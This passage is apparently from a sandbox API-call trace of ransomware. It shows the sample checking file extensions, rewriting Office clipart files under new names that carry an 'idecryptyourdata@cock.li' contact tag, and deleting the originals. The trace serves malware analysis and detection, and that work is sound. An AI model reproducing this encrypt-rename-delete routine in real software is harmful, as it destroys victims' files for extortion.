dwFileAttributes=0x220) returned 1 [0198.515] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187815.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187815.wmf")) returned 1 [0198.515] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187815.WMF") returned 68 [0198.515] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187815.WMF") returned 68 [0198.515] lstrlenW (lpString=".doc") returned 4 [0198.515] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0198.515] lstrlenW (lpString=".docx") returned 5 [0198.515] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1 [0198.515] lstrlenW (lpString=".pdf") returned 4 [0198.515] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0198.515] lstrlenW (lpString=".xls") returned 4 [0198.515] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0198.516] lstrlenW (lpString=".xlsx") returned 5 [0198.516] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1 [0198.516] lstrlenW (lpString=".ppt") returned 4 [0198.516] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0198.516] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187815.WMF") returned 68 [0198.516] lstrlenW (lpString=".zip") returned 4 [0198.516] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0198.516] lstrlenW (lpString=".rar") returned 4 [0198.516] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0198.516] lstrlenW (lpString=".bz2") returned 4 [0198.516] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0198.516] lstrlenW (lpString=".7z") returned 3 [0198.516] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0198.516] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187815.WMF") returned 68 [0198.516] lstrlenW (lpString=".dbf") returned 4 [0198.516] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0198.516] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187815.WMF") returned 68 [0198.516] lstrlenW (lpString=".1cd") returned 4 [0198.516] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0198.516] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187815.WMF") returned 68 [0198.516] lstrlenW (lpString=".jpg") returned 4 [0198.516] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0198.516] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.516] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.517] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187817.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187817.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0198.517] GetLastError () returned 0x0 [0198.517] ReadFile (in: hFile=0x358, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x2d7c, lpOverlapped=0x0) returned 1 [0198.539] WriteFile (in: hFile=0x3a4, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x2d80, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x2d80, lpOverlapped=0x0) returned 1 [0198.541] ReadFile (in: hFile=0x358, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0198.541] WriteFile (in: hFile=0x3a4, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0198.541] SetEndOfFile (hFile=0x3a4) returned 1 [0198.543] CloseHandle (hObject=0x3a4) returned 1 [0198.543] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.543] SetEndOfFile (hFile=0x358) returned 1 [0198.543] CloseHandle (hObject=0x358) returned 1 [0198.543] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187817.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0198.544] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187817.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187817.wmf")) returned 1 [0198.544] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187817.WMF") returned 68 [0198.544] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187817.WMF") returned 68 [0198.544] lstrlenW (lpString=".doc") returned 4 [0198.544] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0198.544] lstrlenW (lpString=".docx") returned 5 [0198.544] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1 [0198.544] lstrlenW (lpString=".pdf") returned 4 [0198.544] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0198.544] lstrlenW (lpString=".xls") returned 4 [0198.545] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0198.545] lstrlenW (lpString=".xlsx") returned 5 [0198.545] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1 [0198.545] lstrlenW (lpString=".ppt") returned 4 [0198.545] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0198.545] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187817.WMF") returned 68 [0198.545] lstrlenW (lpString=".zip") returned 4 [0198.545] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0198.545] lstrlenW (lpString=".rar") returned 4 [0198.545] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0198.545] lstrlenW (lpString=".bz2") returned 4 [0198.545] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0198.545] lstrlenW (lpString=".7z") returned 3 [0198.545] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0198.545] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187817.WMF") returned 68 [0198.545] lstrlenW (lpString=".dbf") returned 4 [0198.545] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0198.545] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187817.WMF") returned 68 [0198.545] lstrlenW (lpString=".1cd") returned 4 [0198.545] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0198.545] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187817.WMF") returned 68 [0198.545] lstrlenW (lpString=".jpg") returned 4 [0198.545] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0198.545] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.545] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.546] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187819.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187819.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0198.547] GetLastError () returned 0x0 [0198.547] ReadFile (in: hFile=0x358, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x2870, lpOverlapped=0x0) returned 1 [0198.680] WriteFile (in: hFile=0x3a4, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x2880, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x2880, lpOverlapped=0x0) returned 1 [0198.681] ReadFile (in: hFile=0x358, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0198.681] WriteFile (in: hFile=0x3a4, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0198.681] SetEndOfFile (hFile=0x3a4) returned 1 [0198.681] CloseHandle (hObject=0x3a4) returned 1 [0198.681] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.681] SetEndOfFile (hFile=0x358) returned 1 [0198.682] CloseHandle (hObject=0x358) returned 1 [0198.682] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187819.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0198.758] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187819.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187819.wmf")) returned 1 [0198.760] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187819.WMF") returned 68 [0198.760] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187819.WMF") returned 68 [0198.760] lstrlenW (lpString=".doc") returned 4 [0198.760] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0198.760] lstrlenW (lpString=".docx") returned 5 [0198.760] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1 [0198.760] lstrlenW (lpString=".pdf") returned 4 [0198.760] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0198.760] lstrlenW (lpString=".xls") returned 4 [0198.760] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0198.760] lstrlenW (lpString=".xlsx") returned 5 [0198.760] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1 [0198.760] lstrlenW (lpString=".ppt") returned 4 [0198.760] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0198.760] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187819.WMF") returned 68 [0198.760] lstrlenW (lpString=".zip") returned 4 [0198.760] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0198.760] lstrlenW (lpString=".rar") returned 4 [0198.760] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0198.760] lstrlenW (lpString=".bz2") returned 4 [0198.760] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0198.760] lstrlenW (lpString=".7z") returned 3 [0198.760] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0198.760] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187819.WMF") returned 68 [0198.760] lstrlenW (lpString=".dbf") returned 4 [0198.760] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0198.760] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187819.WMF") returned 68 [0198.760] lstrlenW (lpString=".1cd") returned 4 [0198.761] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0198.761] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187819.WMF") returned 68 [0198.761] lstrlenW (lpString=".jpg") returned 4 [0198.761] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0198.761] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.761] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.761] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187881.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187881.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0198.762] GetLastError () returned 0x0 [0198.762] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x1258, lpOverlapped=0x0) returned 1 [0198.763] WriteFile (in: hFile=0x340, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x1260, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x1260, lpOverlapped=0x0) returned 1 [0198.764] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0198.765] WriteFile (in: hFile=0x340, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0198.765] SetEndOfFile (hFile=0x340) returned 1 [0198.765] CloseHandle (hObject=0x340) returned 1 [0198.765] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.765] SetEndOfFile (hFile=0x3a0) returned 1 [0198.766] CloseHandle (hObject=0x3a0) returned 1 [0198.766] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187881.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0198.766] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187881.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187881.wmf")) returned 1 [0198.767] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187881.WMF") returned 68 [0198.767] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187881.WMF") returned 68 [0198.767] lstrlenW (lpString=".doc") returned 4 [0198.767] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0198.767] lstrlenW (lpString=".docx") returned 5 [0198.767] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1 [0198.767] lstrlenW (lpString=".pdf") returned 4 [0198.767] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0198.767] lstrlenW (lpString=".xls") returned 4 [0198.767] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0198.767] lstrlenW (lpString=".xlsx") returned 5 [0198.767] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1 [0198.767] lstrlenW (lpString=".ppt") returned 4 [0198.767] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0198.767] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187881.WMF") returned 68 [0198.767] lstrlenW (lpString=".zip") returned 4 [0198.767] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0198.767] lstrlenW (lpString=".rar") returned 4 [0198.767] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0198.767] lstrlenW (lpString=".bz2") returned 4 [0198.767] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0198.767] lstrlenW (lpString=".7z") returned 3 [0198.767] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0198.767] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187881.WMF") returned 68 [0198.767] lstrlenW (lpString=".dbf") returned 4 [0198.767] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0198.767] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187881.WMF") returned 68 [0198.767] lstrlenW (lpString=".1cd") returned 4 [0198.767] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0198.767] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187881.WMF") returned 68 [0198.767] lstrlenW (lpString=".jpg") returned 4 [0198.767] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0198.768] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.768] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.768] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187883.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187883.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0198.769] GetLastError () returned 0x0 [0198.769] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x834, lpOverlapped=0x0) returned 1 [0198.770] WriteFile (in: hFile=0x340, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x840, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x840, lpOverlapped=0x0) returned 1 [0198.771] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0198.771] WriteFile (in: hFile=0x340, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0198.771] SetEndOfFile (hFile=0x340) returned 1 [0198.771] CloseHandle (hObject=0x340) returned 1 [0198.771] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.771] SetEndOfFile (hFile=0x3a0) returned 1 [0198.772] CloseHandle (hObject=0x3a0) returned 1 [0198.772] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187883.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0198.772] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187883.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187883.wmf")) returned 1 [0198.773] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187883.WMF") returned 68 [0198.773] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187883.WMF") returned 68 [0198.773] lstrlenW (lpString=".doc") returned 4 [0198.773] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0198.773] lstrlenW (lpString=".docx") returned 5 [0198.773] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1 [0198.773] lstrlenW (lpString=".pdf") returned 4 [0198.773] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0198.773] lstrlenW (lpString=".xls") returned 4 [0198.773] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0198.773] lstrlenW (lpString=".xlsx") returned 5 [0198.773] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1 [0198.773] lstrlenW (lpString=".ppt") returned 4 [0198.773] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0198.773] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187883.WMF") returned 68 [0198.773] lstrlenW (lpString=".zip") returned 4 [0198.773] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0198.773] lstrlenW (lpString=".rar") returned 4 [0198.773] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0198.773] lstrlenW (lpString=".bz2") returned 4 [0198.773] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0198.773] lstrlenW (lpString=".7z") returned 3 [0198.773] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0198.773] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187883.WMF") returned 68 [0198.774] lstrlenW (lpString=".dbf") returned 4 [0198.774] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0198.774] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187883.WMF") returned 68 [0198.774] lstrlenW (lpString=".1cd") returned 4 [0198.774] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0198.774] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187883.WMF") returned 68 [0198.774] lstrlenW (lpString=".jpg") returned 4 [0198.774] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0198.774] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.774] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.774] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187893.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187893.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0198.775] GetLastError () returned 0x0 [0198.775] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x15f4, lpOverlapped=0x0) returned 1 [0198.776] WriteFile (in: hFile=0x340, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x1600, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x1600, lpOverlapped=0x0) returned 1 [0198.777] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0198.777] WriteFile (in: hFile=0x340, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0198.778] SetEndOfFile (hFile=0x340) returned 1 [0198.778] CloseHandle (hObject=0x340) returned 1 [0198.778] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.778] SetEndOfFile (hFile=0x3a0) returned 1 [0198.780] CloseHandle (hObject=0x3a0) returned 1 [0198.780] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187893.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0198.780] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187893.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187893.wmf")) returned 1 [0198.781] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187893.WMF") returned 68 [0198.781] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187893.WMF") returned 68 [0198.781] lstrlenW (lpString=".doc") returned 4 [0198.781] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0198.781] lstrlenW (lpString=".docx") returned 5 [0198.781] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1 [0198.781] lstrlenW (lpString=".pdf") returned 4 [0198.781] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0198.781] lstrlenW (lpString=".xls") returned 4 [0198.781] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0198.781] lstrlenW (lpString=".xlsx") returned 5 [0198.781] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1 [0198.781] lstrlenW (lpString=".ppt") returned 4 [0198.781] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0198.781] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187893.WMF") returned 68 [0198.782] lstrlenW (lpString=".zip") returned 4 [0198.782] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0198.782] lstrlenW (lpString=".rar") returned 4 [0198.782] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0198.782] lstrlenW (lpString=".bz2") returned 4 [0198.782] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0198.782] lstrlenW (lpString=".7z") returned 3 [0198.782] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0198.782] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187893.WMF") returned 68 [0198.782] lstrlenW (lpString=".dbf") returned 4 